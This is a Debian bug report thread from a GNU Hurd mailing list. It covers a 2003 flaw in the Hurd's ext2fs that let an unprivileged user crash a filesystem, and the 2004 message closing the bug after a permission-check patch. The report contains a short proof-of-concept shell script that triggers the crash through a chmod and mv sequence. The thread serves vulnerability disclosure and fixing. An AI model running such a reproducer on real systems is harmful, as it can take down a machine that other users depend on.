Your message dated Mon, 1 Mar 2004 19:18:16 +0100
with message-id <[EMAIL PROTECTED]>
and subject line hurd: non-priviledged user may crash filesystem
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 25 Apr 2003 12:05:35 +0000
>From [EMAIL PROTECTED] Fri Apr 25 07:05:33 2003
Return-path: <[EMAIL PROTECTED]>
Received: from 80-24-13-86.uc.nombres.ttd.es (getyouriso.dyndns.org) [80.24.13.86]
by master.debian.org with esmtp (Exim 3.12 1 (Debian))
id 1991xK-0005xc-00; Fri, 25 Apr 2003 07:05:31 -0500
Received: from aragorn ([192.168.0.3])
by getyouriso.dyndns.org with esmtp (Exim 3.35 #1 (Debian))
id 1993A8-0001PG-00; Fri, 25 Apr 2003 15:22:48 +0200
Received: from rmh by aragorn with local (Exim 3.35 #1 (Debian))
id 1991wd-0002Nf-00; Fri, 25 Apr 2003 14:04:47 +0200
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Robert Millan <[EMAIL PROTECTED]>
To: Debian Bug Tracking System <[EMAIL PROTECTED]>
Subject: hurd: non-priviledged user may crash filesystem
X-Mailer: reportbug 2.10.1
Date: Fri, 25 Apr 2003 14:04:47 +0200
Message-Id: <[EMAIL PROTECTED]>
Sender: Robert Millan <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]
X-Spam-Status: No, hits=-6.0 required=4.0
tests=BAYES_01,HAS_PACKAGE
version=2.53
X-Spam-Level:
X-Spam-Checker-Version: SpamAssassin 2.53 (1.174.2.15-2003-03-30-exp)
Package: hurd
Version: 20021118-2
Severity: critical
by exploiting this bug, a non-priviledged user is able to crash
a filesystem on which he/she has read/write access to. if that
filesystem is /, then is able to crash the whole system.
test log:
$ dd if=/dev/zero of=./fs ibs=32k count=10 ; mke2fs -o hurd ./fs
[...]
$ settrans -cafg ./mnt /hurd/ext2fs ./fs
$ cat cbtf
#!/bin/sh -x
# crashes the filesystem on which it is being run.
# (caution: if that filesystem is /, crashes the system)
rm -rf no-write dir
mkdir -p no-write/dir
chmod 555 no-write
mv no-write/dir .
$ ./cbtf
+ rm -rf no-write dir
+ mkdir -p no-write/dir
+ chmod 555 no-write
+ mv no-write/dir .
ext2fs: ../../libdiskfs/dir_renamed.c: 202: diskfs_rename_dir: Assertion `tmpnp = fnp'
failed.
mv: cannot move `no_write/dir' to `./dir': Computer bought the farm
-- System Information:
Debian Release: testing/unstable
Architecture: hurd-i386
Kernel: GNU aragorn 0.3 GNUmach-1.2/Hurd-0.3 i386-AT386
Locale: LANG=C, LC_CTYPE=C
Versions of packages hurd depends on:
ii libc0.3 2.3.1-5 GNU C Library: Shared libraries an
ii libncursesw5 5.2.20020112a-8 Shared libraries for terminal hand
-- no debconf information
---------------------------------------
Received: (at 190732-done) by bugs.debian.org; 1 Mar 2004 18:48:16 +0000
>From [EMAIL PROTECTED] Mon Mar 01 10:48:16 2004
Return-path: <[EMAIL PROTECTED]>
Received: from mail.gmx.net [213.165.64.20]
by spohr.debian.org with smtp (Exim 3.35 1 (Debian))
id 1AxsSe-00015W-00; Mon, 01 Mar 2004 10:48:16 -0800
Received: (qmail 9380 invoked by uid 65534); 1 Mar 2004 18:47:44 -0000
Received: from dj.stud.chemie.tu-muenchen.de (EHLO blackbird.oase.mhn.de)
(129.187.128.65)
by mail.gmx.net (mp005) with SMTP; 01 Mar 2004 19:47:44 +0100
X-Authenticated: #686195
Received: from mbanck by blackbird.oase.mhn.de with local (Exim 3.36 #1 (Debian))
id 1Axrzd-0004Pc-00
for <[EMAIL PROTECTED]>; Mon, 01 Mar 2004 19:18:17 +0100
Date: Mon, 1 Mar 2004 19:18:16 +0100
From: Michael Banck <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: hurd: non-priviledged user may crash filesystem
Message-ID: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.5.1+cvs20040105i
Sender: Michael Banck <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2004_03_01
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=0.0 required=4.0 tests=none autolearn=no
version=2.60-bugs.debian.org_2004_03_01
X-Spam-Level:
This bug has been fixed by the recent upload of hurd_20040301-1. One
patch has been applied to fix this bug:
2003-06-11 Ognyan Kulev <[EMAIL PROTECTED]>
* dir-renamed.c (diskfs_rename_dir): Check permissions to remove
FROMNAME before any modification could take place. Check result
of removing the from node.
The still not applied patch for libdiskfs contained in the bug log is
also available at
http://savannah.gnu.org/patch/?func=detailitem&item_id=1839
Thanks,
Michael
_______________________________________________
Bug-hurd mailing list
[EMAIL PROTECTED]
http://mail.gnu.org/mailman/listinfo/bug-hurd
